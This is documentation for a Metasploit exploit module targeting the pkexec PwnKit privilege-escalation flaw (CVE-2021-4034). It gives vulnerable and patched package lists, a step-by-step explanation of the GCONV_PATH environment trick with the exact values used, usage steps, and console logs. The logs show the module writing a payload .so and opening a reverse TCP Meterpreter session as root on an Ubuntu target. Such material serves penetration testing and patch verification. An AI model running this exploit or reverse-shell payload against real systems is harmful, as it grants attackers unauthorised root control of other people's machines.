## Vulnerable Application

The `check` method uses the exploit without a payload.  Vulnerable versions of pkexec
give the error that the shell was not in the shells folder if you pass in the exploit
without a payload to execute.  Patched versions exit and give the `help` output if executed
with no arguments.

First Patched Ubuntu packages:

- 20.04: 0.105-26ubuntu1.2
- 21.10: 0.105-31ubuntu0.1
- 18.04: 0.105-20ubuntu0.18.04.6

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

First Patched Debian Packages:

- stretch: 0.105-18+deb9u2
- buster: 0.105-25+deb10u1
- bullseye: 0.105-31+deb11u1

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

Vulnerable CentOS Packages:

- polkit-0.112-5.ael7b
- polkit-0.112-13.p1.el7a
- polkit-0.96-2.el6
- polkit-0.96-2.el6_0.1
- polkit-0.96-5.el6_4
- polkit-0.96-7.el6
- polkit-0.96-7.el6_6.1
- polkit-0.96-11.el6
- polkit-0.96-11.el6_10.1
- polkit-0.112-1.el7
- polkit-0.112-5.el7
- polkit-0.112-6.el7_2
- polkit-0.112-7.el7_2.2
- polkit-0.112-7.el7_2.3
- polkit-0.112-7.el7_2
- polkit-0.112-9.el7
- polkit-0.112-11.el7_3
- polkit-0.112-12.el7_3
- polkit-0.112-12.el7_4.1
- polkit-0.112-14.el7
- polkit-0.112-14.el7_5.1
- polkit-0.112-17.el7
- polkit-0.112-18.el7
- polkit-0.112-18.el7_6.1
- polkit-0.112-18.el7_6.2
- polkit-0.112-22.el7
- polkit-0.112-22.el7_7.1
- polkit-0.112-26.el7
- polkit-0.115-6.el8
- polkit-0.115-9.el8
- polkit-0.115-9.el8_1.1
- polkit-0.115-11.el8
- polkit-0.115-11.el8_2.1
- polkit-0.115-11.el8_3.2
- polkit-0.115-11.el8_4.1
- polkit-0.115-12.el8

Source: https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/

### Fedora:

Fedora should be vulnerable, and the pkexec binary will respond like it is vulnerable, but
the exploit will fail.  I don't know why, but it still fails with SELinux disabled or using the
original PoCs that compiled a binary on target.  The check method just bails if it sees Fedora.

```
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 33 (Linux 5.8.15-301.fc33.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2396 created.
Channel 5 created.
sestatus
SELinux status:                 disabled
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set auto
set autocheck                 set autorunscript             set autounhookprocess         
set autoloadstdapi            set autosysteminfo            set autoverifysessiontimeout  
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set autoCheck false
autoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > check

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.117
[*] The target is not exploitable. Fedora is not supported
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.wqogdpzub
[*] /tmp/.wqogdpzub created
[*] Writing '/tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.wqogdpzub
[*] Running python /tmp/.wqogdpzub/.skihoukdb /usr/bin/pkexec /tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so kfmlrhrqi jdtnqzvqn
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “jdtnqzvqn”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[*] Exploit completed, but no session was created.
```

### RedHat:
Untested on Redhat, but I assume similar to Fedora.

## Summary

Polkit's pkexec binary is a bit like sudo in that it allows users to run an application as another user.
For instance, when you run something like `pkexec ls` you'll be prompted for the root user's password.
Because it allows elevated launching of programs, pkexec runs as root.

Processes that run like this are considered special and are run in a Secure-execution mode, which causes
the dynamic linker (ld.so) to strip out problematic environment variables that could introduce security
concerns.  One of these "untrusted" environment variables stripped out by the linker is `GCONV_PATH`, which
sets the location for text conversion libraries.  If a binary needs to convert a text string to a different
encoding, it will load/execute the library specified by `GCONV_PATH`.

For example, if we could get pkexec to run with the environment string `GCONV_PATH=./exploit`, pkexec would
load and execute the exploit as root if we were able to coerce the binary to use an unknown charset.  This
is why the dynamic linker prevents such an environment variable from being passed into secure-execution mode
binaries.

The check to prevent `GCONV_PATH` environment variables is done when a program loads, so if we can modify
the environment variables after the program loads, we could add it, but as the process runs as root, we
could not change those values ourselves.

This is where the logic flaw in pkexec can be abused.  pkexec runs through each argument it is passed and
calls `g_find_program_in_path` which takes a filename and replaces the filename with the full path to the
file, according to its `PATH` environment.  Since there can be multiple binaries, this is done within a
loop.  The specific bug in pkexec is that the loop will always run at least once, even if the number of
arguments is 0.

If the number of arguments is 0, then it will still attempt to resolve the element it pulls from memory
at the location the first argument would have been located.  Because of how the stack is structured,
environment variables are located right after argument values in memory, so if there are no argument values,
then the environment values are there.  The exploit works by coercing `g_find_program_in_path` into
writing `GCONV_PATH=./exploit` into the first slot in the environment list.

We can do this by creating a folder in the `PATH` called `GCONV_PATH=.` and within that folder, place a 
file named `abc`.  We also add the directory `GCONV_PATH` to the `PATH` environment variable.  Now, when
we launch pkexec without any arguments, but with `abc` as the first environment variable and `PATH=GCONV_PATH=`
as the second, `g_find_program_in_path` will look for `abc` in the folder `GCONV_PATH=.` and find it.
It will then overwrite the first environment variable withe the full path to the file as it exists in
our PATH: `GCONV_PATH=./abc` or exactly what we'd like to have as our environment variable.
Now, if we can coerce pkexec to use an unknown charset, it will load the library `./abc.so` which we'll make
the name of our payload.

We can coerce the loading of the .so by adding another environment variable declaring some unknown
charset: `CHARSET=garbage` would work fine if we could get pkexec to need to write a log.  We can 
get it to write a log by giving a bad value for something it depends on.  In our case, we're using
the `SHELL` environment variable.

So, to sum up, if we give pkexec a bad value for the `SHELL` environment variable and an unknown charset
to encode, it will load the .so file specified by `GCONV_PATH` and run it as root in an attempt to
encode to the unknown charset.

To break it down, we need to place a .so payload binary in our current working directory called 
`abc.so` and call pkexec with no arguments and the environment values:

`abc`

`PATH=GCONV_PATH=.`

`SHELL=/garbage`

`CHARSET=garbage`

Once `g_find_program_in_path` runs, the environment variables will be changed to:

`GCONV_PATH=./abc.so`

`PATH=GCONV_PATH=.`

`SHELL=/garbage`

`CHARSET=garbage`

The result will be that pkexec errors while trying to encode test to the non-existant charset, causing it to
load the provided abc.so file in the root context.

## Verification

* Start `msfconsole`
* Get a non-root shell/meterpreter
* use `exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`
* set SESSION `<session-id>`
* set LHOST `<lhost-IP>`
* `run`

## Options


### WRITEABLE_DIR
This indicates the location where you would like the payload and exploit stored, as well
as serving as a location to store the various files and directories created by the exploit itself.
The default value is `/tmp`

### PKEXEC_PATH
This indicates the location of the `pkexec` binary.  Normally, the module can find the it without help.
It defaults to nil.

## Advanced Options

### FinalDir
This indicates the starting directory for the new root-enabled session.  The module deletes the working directory
out from under the running payload, so the current working directory for the new session will not exist, and that
can result in odd errors, so we just change to a directory that does exist before user interaction.
It defaults to `/`

## Scenarios

```
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION       1                yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-26ubuntu1
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.pacfbr
[*] /tmp/.pacfbr created
[!] Verify cleanup of /tmp/.pacfbr
[*] Running python3 /tmp/.pacfbr/.jxkiwyj /usr/bin/pkexec /tmp/.pacfbr/khmtpqj/khmtpqj.so khmtpqj mbbidsfl
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “mbbidsfl”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lukbdme
[*] /tmp/.lukbdme created
[*] Writing '/tmp/.lukbdme/rnaxcz/rnaxcz.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.lukbdme
[*] Running python3 /tmp/.lukbdme/.iwksanwva /usr/bin/pkexec /tmp/.lukbdme/rnaxcz/rnaxcz.so rnaxcz jnagcbkqds
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.107
[+] Deleted /tmp/.lukbdme/rnaxcz/rnaxcz.so
[+] Deleted /tmp/.lukbdme/.iwksanwva
[!] Attempting to delete working directory /tmp/.lukbdme
[!] Attempting to delete working directory /tmp/.lukbdme
[*] Meterpreter session 3 opened (10.5.135.101:4444 -> 10.5.132.107:54758 ) at 2022-03-01 14:40:18 -0600

meterpreter > sysinfo
Computer     : 10.5.132.107
OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/
meterpreter > 


```

**Reference:** https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
